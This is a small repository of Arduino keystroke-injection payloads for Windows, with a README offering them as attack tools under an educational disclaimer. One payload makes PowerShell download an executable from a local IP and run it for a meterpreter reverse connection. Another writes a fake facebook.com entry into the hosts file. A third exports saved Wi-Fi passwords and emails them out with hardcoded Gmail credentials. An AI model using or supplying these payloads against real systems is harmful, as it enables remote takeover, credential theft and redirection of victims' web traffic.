├── README.md
├── Reverse_Connection.txt
├── dns_Poisoning.txt
└── wifi.txt
/README.md:
--------------------------------------------------------------------------------
1 | # USB-Rubber-Ducky-Arduino-Payloads
2 | ##### wifi.txt ==> Contains an arduino payload to dump all Wifi passwords for victim and send a zip file to attacker email.
3 | ##### dns_Poisoning.txt ==> Contains an arduino payload to change a hosts file in windows .
4 | ##### Reverse_Connection.txt ==> Contains an arduino payload to hack a windows machine and create a Reverse Connection to meterpreter
5 |
6 |
7 |
8 | # Legal Disclamer:
9 | ##### The author does not hold any responsibility for the bad use of this tool, remember this is only for educational purpose.
10 |
--------------------------------------------------------------------------------
/Reverse_Connection.txt:
--------------------------------------------------------------------------------
1 | #include "Keyboard.h"
2 |
3 | void typeKey(int key)
4 | {
5 | Keyboard.press(key);
6 | delay(50);
7 | Keyboard.release(key);
8 | }
9 |
10 | /* Init function */
11 | void setup()
12 | {
13 | // Begining the Keyboard stream
14 | Keyboard.begin();
15 |
16 | // Wait 500ms
17 | delay(500);
18 |
19 | Keyboard.press(KEY_LEFT_GUI);
20 | Keyboard.press('r');
21 | Keyboard.releaseAll();
22 |
23 | delay(100);
24 |
25 | Keyboard.print("powershell -NoP -NonI -W Hidden -Exec Bypass \"IEX (New-Object System.Net.WebClient).DownloadFile('http://192.168.0.138/test.exe',\\\"$env:temp\\bob.exe\\\"); Start-Process \\\"$env:temp\\bob.exe\\\"\"");
26 |
27 | typeKey(KEY_RETURN);
28 |
29 | // Ending stream
30 | Keyboard.end();
31 | }
32 |
33 | /* Unused endless loop */
34 | void loop() {}
--------------------------------------------------------------------------------
/dns_Poisoning.txt:
--------------------------------------------------------------------------------
1 | #include "Keyboard.h"
2 |
3 | void typeKey(int key)
4 | {
5 | Keyboard.press(key);
6 | delay(50);
7 | Keyboard.release(key);
8 | }
9 |
10 | /* Init function */
11 | void setup()
12 | {
13 | // Begining the Keyboard stream
14 | Keyboard.begin();
15 |
16 | // Wait 500ms
17 | delay(500);
18 |
19 | delay(500);
20 |
21 | Keyboard.press(KEY_LEFT_GUI);
22 | Keyboard.press('r');
23 | Keyboard.releaseAll();
24 |
25 | delay(300);
26 |
27 | Keyboard.print("cmd");
28 |
29 | delay(300);
30 |
31 | Keyboard.press(KEY_LEFT_CTRL);
32 | Keyboard.press(KEY_LEFT_SHIFT);
33 | Keyboard.press(KEY_RETURN);
34 | Keyboard.releaseAll();
35 |
36 | typeKey(KEY_RETURN);
37 |
38 | delay(300);
39 |
40 | typeKey(KEY_LEFT_ARROW);
41 |
42 | delay(1000);
43 |
44 | typeKey(KEY_RETURN);
45 | delay(1000);
46 |
47 | Keyboard.print("ECHO. >> C:\\WINDOWS\\SYSTEM32\\DRIVERS\\ETC\\HOSTS");
48 |
49 | typeKey(KEY_RETURN);
50 |
51 | delay(1000);
52 |
53 | Keyboard.print("ECHO ATTACKER_WEBserverIP facebook.COM >> C:\\WINDOWS\\SYSTEM32\\DRIVERS\\ETC\\HOSTS");
54 |
55 | typeKey(KEY_RETURN);
56 | delay(1000);
57 |
58 | Keyboard.print("exit");
59 |
60 | typeKey(KEY_RETURN);
61 |
62 | // Ending stream
63 | Keyboard.end();
64 |
65 | }
66 |
67 |
68 | void loop() {}
--------------------------------------------------------------------------------
/wifi.txt:
--------------------------------------------------------------------------------
1 | #include "Keyboard.h"
2 |
3 | void typeKey(int key)
4 | {
5 | Keyboard.press(key);
6 | delay(50);
7 | Keyboard.release(key);
8 | }
9 |
10 | /* Init function */
11 | void setup()
12 | {
13 | // Begining the Keyboard stream
14 | Keyboard.begin();
15 |
16 | // Wait 500ms
17 | delay(500);
18 |
19 | delay(3000);
20 |
21 | Keyboard.press(KEY_LEFT_GUI);
22 | Keyboard.press('r');
23 | Keyboard.releaseAll();
24 |
25 | delay(500);
26 |
27 | Keyboard.print("cmd");
28 |
29 | delay(500);
30 |
31 | typeKey(KEY_RETURN);
32 |
33 | delay(750);
34 |
35 | Keyboard.print("netsh wlan export profile key=clear > ./null");
36 |
37 | typeKey(KEY_RETURN);
38 | delay(750);
39 |
40 | Keyboard.print("mkdir WifiPasswords");
41 |
42 | typeKey(KEY_RETURN);
43 |
44 | delay(750);
45 |
46 | Keyboard.print("xcopy *.xml WifiPasswords");
47 |
48 | typeKey(KEY_RETURN);
49 |
50 | delay(750);
51 |
52 | Keyboard.print("powershell");
53 |
54 | typeKey(KEY_RETURN);
55 |
56 | delay(750);
57 |
58 | Keyboard.print("Compress-Archive -Path ./WifiPasswords/* -DestinationPath ./WifiPassword.zip");
59 |
60 | typeKey(KEY_RETURN);
61 |
62 | delay(750);
63 |
64 | Keyboard.print("$SMTPServer = 'smtp.gmail.com'");
65 |
66 | typeKey(KEY_RETURN);
67 |
68 | delay(750);
69 |
70 | Keyboard.print("$SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)");
71 |
72 | typeKey(KEY_RETURN);
73 |
74 | delay(750);
75 |
76 | Keyboard.print("$SMTPInfo.EnableSsl = $true");
77 |
78 | typeKey(KEY_RETURN);
79 |
80 | delay(750);
81 |
82 | Keyboard.print("$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('looogger96@gmail.com','@@looogger96@@');");
83 |
84 | typeKey(KEY_RETURN);
85 |
86 |
87 | delay(750);
88 |
89 | Keyboard.print("$ReportEmail = New-Object System.Net.Mail.MailMessage");
90 |
91 | typeKey(KEY_RETURN);
92 |
93 |
94 |
95 | delay(750);
96 |
97 | Keyboard.print("$ReportEmail.From = 'looogger96@gmail.com'");
98 |
99 | typeKey(KEY_RETURN);
100 |
101 |
102 |
103 | delay(750);
104 |
105 | Keyboard.print("$ReportEmail.To.Add('looogger96@gmail.com')");
106 |
107 | typeKey(KEY_RETURN);
108 |
109 |
110 |
111 | delay(750);
112 |
113 | Keyboard.print("$ReportEmail.Subject = 'Ducky chrome password'");
114 |
115 | typeKey(KEY_RETURN);
116 |
117 |
118 | delay(750);
119 |
120 | Keyboard.print("$ReportEmail.Attachments.Add('./WifiPassword.zip')");
121 |
122 | typeKey(KEY_RETURN);
123 |
124 |
125 |
126 |
127 | delay(750);
128 |
129 | Keyboard.print("$SMTPInfo.Send($ReportEmail)");
130 |
131 | typeKey(KEY_RETURN);
132 |
133 |
134 | // Ending stream
135 | Keyboard.end();
136 | }
137 |
138 | /* Unused endless loop */
139 | void loop() {}
--------------------------------------------------------------------------------